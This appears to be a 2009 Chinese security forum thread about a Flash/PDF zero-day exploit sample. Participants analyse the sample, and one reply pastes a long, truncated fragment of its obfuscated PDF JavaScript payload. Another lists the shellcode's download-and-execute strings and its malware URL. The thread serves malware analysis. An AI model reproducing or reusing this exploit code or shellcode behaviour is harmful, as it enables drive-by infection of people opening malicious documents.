首页
社区
课程
招聘
[转帖]flash新漏洞的PoC...
发表于: 2009-7-25 09:57 5502

[转帖]flash新漏洞的PoC...

2009-7-25 09:57
5502
@hdmoore live exploit sample for the new Flash bug (embedded in PDF)

Don't play with it if you don't know what it does...  This virus is srs business. /str0ke

http://www.milw0rm.com/exploits/9233

# milw0rm.com [2009-07-23]

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

收藏
免费 0
支持
分享
最新回复 (13)
雪    币: 207
活跃值: (351)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
我很白,真的不知道这玩意是什么意思,哪位大大来解释下,乱码?
2009-7-25 10:33
0
雪    币: 95
活跃值: (10)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
3
去看看。。。
2009-7-25 11:07
0
雪    币: 357
活跃值: (3393)
能力值: ( LV3,RANK:25 )
在线值:
发帖
回帖
粉丝
4
怎么在主页没发现这个链接,内部链接?
2009-7-25 16:12
0
雪    币: 339
活跃值: (29)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
5
堆栈写入大量0c0c最终导致访问内存出错,激发SEH栈溢出
2009-7-25 22:36
0
雪    币: 339
活跃值: (29)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
6
我想真的移除的原因应该是这个PoC并非22日的这个0day,最新的是应该是PDF中嵌入swf文件。当然不排除a do be 不爽:))

这个其实是一个老的getIcon的exploit.

shellcode 中
URLMON.DLL, URLDownloadToFileA, update.exe, crash.php, http://viorfjoj-2.com/2/update.php?id=0

不过http://viorfjoj-2.com貌似已经关闭
2009-7-26 11:37
0
雪    币: 220
活跃值: (721)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
7
41.89]
>>
endobj
5 0 obj
<</Type /Font
/BaseFont /Helvetica
/Subtype /Type1
/Encoding /WinAnsiEncoding
>>
endobj
2 0 obj
<<
/ProcSet [/PDF /Text /ImageB /ImageC /ImageI]
/Font <<
/F1 5 0 R
>>
/XObject <<
>>
>>
endobj
6 0 obj
<<
/Names [(HUYAKJS) 7 0 R ]
>>
endobj
7 0 obj
<<
/S /JavaScript
/JS (eval\(
function\(p,a,c,k,e,d\){while\(c--\){if\(k[c]\){p=p.replace\(new RegExp\('\\\\b'+c+'\\\\b','g'\),k[c]\)}}return p}\('100\(105\("%13%30%17%28%36%48%35%17%3%86%16%19%36%11%61%14%46%38%83%12%30%46%14%44%25%31%39%65%1%14%18%3%70%31%41%44%1%16%61%5%29%8%7%1%14%18%3%53%1%45"+"111%8%13%46%48%29%4%4%7%27%3%3%13%35%18%3%38%70%31%41%44%1%16%61%5%3%29%3%8%7%70%31%41%44%1%16%61%5%3%69%83%12%30%46%14%44%25%31%51%25%47"+"113%17%16%36%31%7%70%31%41%44%1%16%61%5%9%9%39%65%27%3%3%3%53%1%25%8%13%46%48%3%29%3%53%1%25%8%13%46%48%9%53%36%18%48%17%16%51%13%18%35"+"%41%82%31%14%18%82%35%50%15%38%83%12%30%46%14%44%25%31%51%28%31%14%18%82%35%50%15%75%36%38%70%31%41%44%1%16%61%5%39%107%0%39%7%27%3%3%64%27%3%45"+"20%18%15%36%30%18%17%3%53%1%25%8%13%46%48%7%27%64%27%13%30%17%28%36%48%35%17%3%53%41%41%10%35%50%18%38%71%1%35%55%36%28%39%65%27%3%3%3%18%15%47"+"106%30%18%17%3%30%17%15%57%28%14%44%15%38%71%1%35%55%36%28%39%7%27%64%27%1%14%18%3%60%52%30%10%44%42%5%3%29%3%14%44%44%51%1%48%15%52%15%18%70"+"%15%18%57%48%35%17%51%36%35%53%36%18%48%17%16%38%39%7%60%52%30%10%44%42%5%3%29%3%60%52%30%10%44%42%5%51%18%15%44%25%14%28%15%38%81%109%60%81%16%45"+"112%4%4%39%7%27%1%14%18%3%63%50%50%31%30%14%12%12%3%29%3%4%2%1%6%8%6%0%2%1%6%10%6%11%2%1%6%19%6%5%2%1%24%23%6%6%2%1%0%0%47"+"84%3%9%3%4%13%7%2%1%0%0%0%0%2%1%6%16%0%0%2%1%13%16%7%8%2%1%8%11%0%16%2%1%4%3%9%3%4%5%12%23%0%2%1%12%0%0%8%2%1"+"%19%7%8%0%2%1%7%14%0%23%2%1%0%23%12%0%4%3%9%3%4%2%1%19%0%7%14%2%1%21%16%11%23%2%1%12%0%7%14%2%1%13%14%0%7%2%1%7%14%45"+"22%3%9%3%4%0%24%2%1%8%12%12%0%2%1%12%0%7%16%2%1%7%14%19%23%2%1%8%23%12%0%2%1%4%3%9%3%4%6%19%6%5%2%1%6%13%14%13%2%1%47"+"79%0%0%11%2%1%0%11%0%0%2%1%14%15%13%13%4%3%9%3%4%2%1%0%11%12%13%2%1%0%0%0%0%2%1%13%15%0%11%2%1%16%5%13%7%2%1%0%0%4"+"%3%9%3%4%0%11%2%1%6%15%0%0%2%1%7%24%6%13%2%1%7%11%13%21%2%1%6%13%23%10%2%1%4%3%9%3%4%0%0%0%11%2%1%6%10%0%0%2%1%45"+"104%0%5%7%2%1%0%0%0%0%2%1%15%15%0%0%4%3%9%3%4%2%1%12%13%24%6%2%1%0%0%0%11%2%1%7%24%0%0%2%1%7%11%13%21%2%1%6%13%4%47"+"80%9%3%4%23%10%2%1%0%0%0%11%2%1%8%11%0%0%2%1%0%11%15%5%2%1%7%21%23%10%2%1%4%3%9%3%4%8%6%24%23%2%1%0%10%5%8%2%1%0"+"%0%0%0%2%1%15%14%7%0%2%1%19%12%0%0%4%3%9%3%4%2%1%7%7%0%5%2%1%8%10%11%23%2%1%13%14%12%5%2%1%23%5%13%13%2%1%8%10%4%45"+"20%9%3%4%0%12%2%1%7%24%0%0%2%1%7%11%13%21%2%1%12%6%23%10%2%1%0%0%0%10%2%1%4%3%9%3%4%6%10%0%0%2%1%24%6%15%15%2%1%0%47"+"90%6%10%2%1%0%0%0%0%2%1%13%21%7%24%4%3%9%3%4%2%1%23%10%7%11%2%1%0%10%6%0%2%1%0%0%0%0%2%1%6%0%6%10%2%1%24%6%4%3"+"%9%3%4%15%15%2%1%0%11%6%5%2%1%0%0%0%0%2%1%0%0%5%21%2%1%0%0%5%21%2%1%4%3%9%3%4%13%21%7%24%2%1%23%10%7%11%2%1%0%45"+"32%6%13%2%1%0%0%0%0%2%1%7%24%6%10%4%3%9%3%4%2%1%7%11%13%21%2%1%19%7%23%10%2%1%0%0%0%10%2%1%6%10%0%0%2%1%0%0%4%3%47"+"99%3%4%5%21%2%1%16%0%15%15%2%1%0%6%5%21%2%1%13%21%7%24%2%1%23%10%7%11%2%1%4%3%9%3%4%0%11%6%13%2%1%0%0%0%0%2%1%15%15"+"%6%10%2%1%6%21%24%6%2%1%0%0%0%11%4%3%9%3%4%2%1%7%24%0%0%2%1%7%11%13%21%2%1%6%13%23%10%2%1%0%0%0%11%2%1%6%10%4%3%45"+"98%3%4%0%0%2%1%7%0%5%7%2%1%0%0%0%0%2%1%15%15%0%0%2%1%12%13%24%6%2%1%4%3%9%3%4%0%0%0%11%2%1%7%24%0%0%2%1%7%11%47"+"97%21%2%1%6%13%23%10%2%1%0%0%0%11%4%3%9%3%4%2%1%8%11%0%0%2%1%0%11%15%5%2%1%7%21%23%10%2%1%8%6%24%23%2%1%0%10%4%3%9"+"%3%4%5%13%2%1%0%0%0%0%2%1%15%14%7%0%2%1%19%12%0%0%2%1%7%7%0%5%2%1%4%3%9%3%4%8%10%11%23%2%1%13%14%12%5%2%1%23%5%45"+"66%13%2%1%8%10%0%12%2%1%7%24%0%0%4%3%9%3%4%2%1%7%11%13%21%2%1%12%6%23%10%2%1%0%0%0%10%2%1%6%10%0%0%2%1%24%6%4%3%9%47"+"80%4%15%15%2%1%0%11%6%10%2%1%0%0%0%0%2%1%13%21%7%24%2%1%23%10%7%11%2%1%4%3%9%3%4%0%10%6%0%2%1%0%0%0%0%2%1%6%0%6"+"%10%2%1%24%6%15%15%2%1%0%11%6%5%4%3%9%3%4%2%1%0%0%0%0%2%1%0%0%5%21%2%1%0%0%5%21%2%1%13%21%7%24%2%1%23%10%4%3%9%45"+"20%4%7%11%2%1%0%11%6%13%2%1%0%0%0%0%2%1%7%24%6%10%2%1%7%11%13%21%2%1%4%3%9%3%4%21%5%23%10%2%1%0%0%0%10%2%1%6%10%0%47"+"79%2%1%0%0%5%21%2%1%16%0%15%15%4%3%9%3%4%2%1%0%6%5%21%2%1%13%21%7%24%2%1%23%10%7%11%2%1%0%11%6%13%2%1%0%0%4%3%9%3"+"%4%0%0%2%1%15%15%6%10%2%1%6%21%24%6%2%1%0%0%0%11%2%1%24%16%0%0%2%1%4%3%9%3%4%6%15%6%16%2%1%6%21%6%13%2%1%6%14%6%45"+"101%2%1%23%8%6%7%2%1%0%0%0%0%4%3%9%3%4%2%1%0%0%0%0%2%1%0%0%0%0%2%1%0%0%0%0%2%1%0%0%0%0%2%1%0%0%4%3%9%3%47"+"84%0%0%2%1%0%0%0%0%2%1%0%0%0%0%2%1%5%6%12%19%2%1%6%12%19%12%2%1%4%3%9%3%4%5%16%5%6%2%1%6%0%19%0%2%1%19%12%5%11"+"%2%1%12%11%5%7%2%1%12%23%0%0%4%3%9%3%4%2%1%5%11%5%15%2%1%12%23%5%12%2%1%5%10%5%24%2%1%5%11%19%10%2%1%19%24%4%3%9%3%45"+"22%19%10%2%1%0%0%12%11%2%1%5%6%12%19%2%1%6%0%19%12%2%1%5%15%19%10%2%1%4%3%9%3%4%12%11%5%8%2%1%5%12%5%12%2%1%5%6%19%10%47"+"88%1%19%8%19%8%2%1%6%19%0%0%4%3%9%3%4%2%1%5%13%5%24%2%1%19%7%12%6%2%1%5%8%5%6%2%1%14%14%0%0%2%1%15%10%4%3%9%3%4"+"%7%24%2%1%15%19%7%24%2%1%23%0%8%0%2%1%19%6%21%13%2%1%10%24%15%16%2%1%4%3%9%3%4%7%24%15%19%2%1%8%11%15%24%2%1%14%13%23%0%45"+"26%1%0%0%8%23%2%1%0%0%0%0%4%3%9%3%4%2%1%14%6%0%8%2%1%0%10%11%14%2%1%0%0%0%0%2%1%21%16%5%5%2%1%7%6%4%3%9%3%4%47"+"79%8%2%1%0%10%11%14%2%1%0%0%0%0%2%1%19%0%7%14%2%1%7%8%19%7%2%1%4%3%9%3%4%11%23%23%5%2%1%14%6%0%8%2%1%0%10%11%14%2"+"%1%0%0%0%0%2%1%14%16%7%16%4%3%9%3%4%2%1%0%10%11%15%2%1%0%0%0%0%2%1%0%8%21%16%2%1%11%14%7%6%2%1%0%0%4%3%9%3%4%45"+"33%10%2%1%21%14%0%0%2%1%0%8%21%16%2%1%11%14%7%6%2%1%0%0%0%10%2%1%4%3%9%3%4%6%0%0%0%2%1%21%16%21%14%2%1%7%6%0%8%2%47"+"103%0%10%11%14%2%1%0%0%0%0%4%3%9%3%4%2%1%6%13%21%14%2%1%16%14%8%11%2%1%6%5%21%16%2%1%7%6%0%8%2%1%0%10%4%3%9%3%4%11"+"%14%2%1%0%0%0%0%2%1%23%5%7%24%2%1%16%19%7%24%2%1%15%23%6%11%2%1%4%3%9%3%4%21%5%15%8%2%1%19%12%6%24%2%1%6%13%0%12%2%45"+"76%13%14%12%8%2%1%6%13%13%24%4%3%9%3%4%2%1%16%11%24%8%2%1%0%8%13%0%2%1%10%19%7%6%2%1%0%0%0%10%2%1%8%11%4%3%9%3%4%0%47"+"79%2%1%24%5%15%5%2%1%21%16%5%5%2%1%13%0%23%11%2%1%0%8%0%10%2%1%4%3%9%3%4%11%15%7%6%2%1%0%0%0%10%2%1%7%24%0%0%2%1"+"%21%16%23%5%2%1%7%6%0%8%4%3%9%3%4%2%1%0%10%11%14%2%1%0%0%0%0%2%1%13%14%23%8%2%1%0%0%11%0%2%1%0%0%4%3%9%3%4%0%45"+"33%2%1%0%0%0%0%2%1%0%0%0%0%2%1%0%0%0%0%2%1%0%0%0%0%2%1%4%3%9%3%4%0%0%0%0%2%1%0%0%0%0%2%1%7%24%0%0%2%1%47"+"90%14%7%6%2%1%0%0%0%10%4%3%9%3%4%2%1%6%5%0%0%2%1%13%7%6%19%2%1%15%15%6%7%2%1%15%15%15%15%2%1%6%13%4%3%9%3%4%6%15"+"%2%1%0%11%21%14%2%1%7%0%23%13%2%1%14%14%8%13%2%1%0%10%19%12%2%1%4%3%9%3%4%13%16%13%14%2%1%6%6%23%8%2%1%12%23%6%10%2%1%45"+"37%15%12%16%2%1%10%13%12%13%4%3%9%3%4%2%1%12%23%12%12%2%1%0%0%12%23%2%1%6%10%6%6%2%1%12%12%12%23%2%1%19%19%4%3%9%3%4%5%15%47"+"88%1%5%23%5%13%2%1%5%11%5%15%2%1%6%12%5%12%2%1%12%5%5%15%2%1%4%3%9%3%4%5%23%5%24%2%1%12%11%5%6%2%1%19%0%0%0%2%1%5"+"%5%5%12%2%1%19%0%19%6%4%3%9%3%4%2%1%10%13%5%12%2%1%19%7%5%6%2%1%0%0%5%6%2%1%19%10%5%8%2%1%19%8%4%3%9%3%4%5%11%45"+"26%1%10%13%5%7%2%1%5%7%19%0%2%1%0%0%19%0%2%1%19%12%5%7%2%1%4%3%9%3%4%19%0%19%12%2%1%10%15%8%21%2%1%5%10%10%15%2%1%19%47"+"126%5%6%2%1%5%23%19%12%4%3%9%3%4%2%1%19%12%5%24%2%1%5%12%5%6%2%1%19%8%5%24%2%1%5%15%5%8%2%1%5%6%4%3%9%3%4%19%5%2"+"%1%10%13%19%10%2%1%5%13%5%8%2%1%8%7%8%21%2%1%8%7%8%0%2%1%4%3%9%3%4%10%15%8%0%2%1%5%11%5%23%2%1%5%12%5%13%2%1%5%45"+"34%5%24%2%1%19%0%10%13%4%3%9%3%4%2%1%19%0%5%7%2%1%5%24%8%15%2%1%8%16%5%12%2%1%0%0%8%7%2%1%24%0%4%3%9%3%4%0%0%4%47"+"80%9%3%4%4%7%27%27%48%13%38%60%52%30%10%44%42%5%51%28%31%14%18%75%36%38%8%39%3%29%29%3%4%54%4%3%2%2%3%60%52%30%10%44%42%5%51%28%31%14"+"%18%75%36%38%10%39%3%69%29%3%4%10%4%3%2%2%3%60%52%30%10%44%42%5%51%28%31%14%18%75%36%38%11%39%3%69%29%3%4%11%4%39%65%27%43%85%10%11%58%45"+"124%58%3%29%3%53%41%41%10%35%50%18%38%86%16%19%36%11%61%14%46%38%63%50%50%31%30%14%12%12%39%39%7%27%43%1%14%18%3%56%16%5%17%14%44%54%5%3%29%3%47"+"89%41%41%10%35%50%18%38%4%72%30%8%14%8%4%3%9%3%4%14%72%30%8%14%4%3%9%3%4%8%14%4%3%9%3%4%4%39%7%27%43%1%14%18%3%67%28%17%16%0"+"%46%16%0%3%29%3%11%8%3%9%3%85%10%11%58%55%58%51%25%15%17%16%36%31%7%27%43%52%31%48%25%15%38%56%16%5%17%14%44%54%5%51%25%15%17%16%36%31%3%45"+"125%3%67%28%17%16%0%46%16%0%39%3%56%16%5%17%14%44%54%5%3%9%29%3%56%16%5%17%14%44%54%5%7%27%43%1%14%18%3%70%41%30%6%11%28%42%3%29%3%56%47"+"118%5%17%14%44%54%5%51%57%30%21%57%36%18%48%17%16%38%8%73%3%67%28%17%16%0%46%16%0%39%7%27%43%1%14%18%3%60%49%41%16%6%30%42%3%29%3%56%16%5"+"%17%14%44%54%5%51%57%30%21%57%36%18%48%17%16%38%8%73%3%56%16%5%17%14%44%54%5%51%25%15%17%16%36%31%3%87%3%67%28%17%16%0%46%16%0%39%7%27%43%45"+"77%31%48%25%15%38%60%49%41%16%6%30%42%51%25%15%17%16%36%31%3%9%3%67%28%17%16%0%46%16%0%3%69%3%8%42%6%8%8%8%8%39%3%60%49%41%16%6%30%42%47"+"80%29%3%60%49%41%16%6%30%42%3%9%3%60%49%41%16%6%30%42%3%9%3%70%41%30%6%11%28%42%7%27%43%1%14%18%3%78%21%41%0%18%52%36%49%3%29%3%17%15"+"%52%3%75%18%18%14%40%38%39%7%27%43%13%35%18%38%63%1%17%15%31%35%49%3%29%3%8%7%3%63%1%17%15%31%35%49%3%69%3%10%11%8%8%7%3%63%1%17%15%45"+"68%35%49%9%9%39%65%78%21%41%0%18%52%36%49%93%63%1%17%15%31%35%49%94%3%29%3%60%49%41%16%6%30%42%3%9%3%85%10%11%58%55%58%64%27%43%1%14%18%3%47"+"89%50%42%61%25%54%28%3%29%3%4%10%11%4%7%27%43%13%35%18%3%38%1%14%18%3%71%42%21%0%35%17%55%29%8%7%3%71%42%21%0%35%17%55%69%10%54%7%3%71"+"%42%21%0%35%17%55%9%9%39%65%3%53%50%42%61%25%54%28%3%29%3%53%50%42%61%25%54%28%9%4%46%4%7%64%27%43%13%35%18%3%38%1%14%18%3%71%42%21%0%45"+"116%17%55%29%8%7%3%71%42%21%0%35%17%55%69%11%12%6%7%3%71%42%21%0%35%17%55%9%9%39%65%3%53%50%42%61%25%54%28%3%29%3%53%50%42%61%25%54%28%9%47"+"84%54%4%7%64%27%43%13%35%18%3%38%78%40%0%13%52%5%49%29%8%7%3%78%40%0%13%52%5%49%120%10%8%7%3%78%40%0%13%52%5%49%9%9%39%65%78%40%0%13"+"%52%5%49%9%29%11%7%64%27%43%30%36%48%25%51%44%18%48%17%36%13%38%4%72%19%5%8%8%8%13%4%73%3%53%50%42%61%25%54%28%39%7%64%27%15%25%57%15%65%45"+"123%43%1%14%18%3%92%58%11%52%15%1%52%3%29%3%17%15%52%3%75%18%18%14%40%38%39%7%27%43%13%30%17%28%36%48%35%17%3%63%55%30%5%40%6%57%38%56%12%25%47"+"121%12%40%40%73%3%67%31%46%44%6%28%41%49%39%65%27%43%52%31%48%25%15%38%56%12%25%17%12%40%40%51%25%15%17%16%36%31%3%95%3%11%3%69%3%67%31%46%44%6"+"%28%41%49%39%65%27%43%56%12%25%17%12%40%40%3%9%29%3%56%12%25%17%12%40%40%7%64%27%43%56%12%25%17%12%40%40%3%29%3%56%12%25%17%12%40%40%51%57%30%45"+"62%57%36%18%48%17%16%38%8%73%3%67%31%46%44%6%28%41%49%3%81%3%11%39%7%27%43%18%15%36%30%18%17%3%56%12%25%17%12%40%40%7%64%27%43%1%14%18%3%96%47"+"91%58%17%46%10%54%40%25%3%29%3%8%42%8%28%8%28%8%28%8%28%7%27%27%43%1%14%18%3%53%36%50%42%48%6%6%11%3%29%3%53%41%41%10%35%50%18%38%86%16"+"%19%36%11%61%14%46%38%63%50%50%31%30%14%12%12%39%39%7%27%43%1%14%18%3%74%16%30%40%49%16%58%3%29%3%8%42%19%8%8%8%8%8%7%27%43%1%14%18%3%45"+"122%14%21%36%15%55%6%11%3%29%3%53%36%50%42%48%6%6%11%51%25%15%17%16%36%31%3%95%3%11%7%27%43%1%14%18%3%67%31%46%44%6%28%41%49%3%29%3%74%16%47"+"119%40%49%16%58%3%87%3%38%115%14%21%36%15%55%6%11%9%8%42%0%54%39%7%27%43%1%14%18%3%56%12%25%17%12%40%40%3%29%3%53%41%41%10%35%50%18%38%4%72"+"%30%46%8%46%8%72%30%46%8%46%8%4%39%7%27%43%56%12%25%17%12%40%40%3%29%3%63%55%30%5%40%6%57%38%56%12%25%17%12%40%40%73%3%67%31%46%44%6%28%45"+"117%49%39%7%27%43%1%14%18%3%60%16%58%58%5%46%3%29%3%38%96%58%58%17%46%10%54%40%25%3%87%3%8%42%19%8%8%8%8%8%39%3%81%3%74%16%30%40%49%16%47"+"91%7%27%43%13%35%18%3%38%1%14%18%3%74%31%57%35%17%13%11%3%29%3%8%7%3%74%31%57%35%17%13%11%3%69%3%60%16%58%58%5%46%7%74%31%57%35%17%13%11"+"%9%9%39%65%92%58%11%52%15%1%52%93%74%31%57%35%17%13%11%94%3%29%3%56%12%25%17%12%40%40%3%9%3%53%

部分代码是不是这个??
2009-7-27 00:13
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
8
有这个漏洞全部利用代码吗?研究一下.最好解密过的
2009-7-29 10:37
0
雪    币: 0
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
9
这个真不太懂
2009-7-29 11:46
0
雪    币: 1
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
10
漏洞就是从这些由来的。。。
2009-7-29 12:11
0
雪    币: 339
活跃值: (29)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
11
[QUOTE=dayang;661527]41.89]
>>
endobj
5 0 obj
<</Type /Font
/BaseFont /Helvetica
/Subtype /Type1
/Encoding /WinAnsiEncoding
>>
endobj
2 0 obj
<<
/ProcSet [/PDF...[/QUOTE]

不是。是有2个FWS开头的swf文件片段。会drop文件SUCHOST.EXE
2009-7-29 20:49
0
雪    币: 220
活跃值: (721)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
12
楼上的大牛有样本?
2009-7-30 00:37
0
雪    币: 340
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
13
每次都是svchost.exe那个shellcode......
2009-7-30 00:41
0
雪    币: 339
活跃值: (29)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
14
参照这篇文章可以更多了解到漏洞,可以通过跳转的地址和shellcode来辨别

http://www.avertlabs.com/research/blog/index.php/2009/07/22/new-0-day-attacks-using-pdf-documents/

样本网上找找,应该能找到了。
2009-7-30 09:08
0
游客
登录 | 注册 方可回帖
返回
//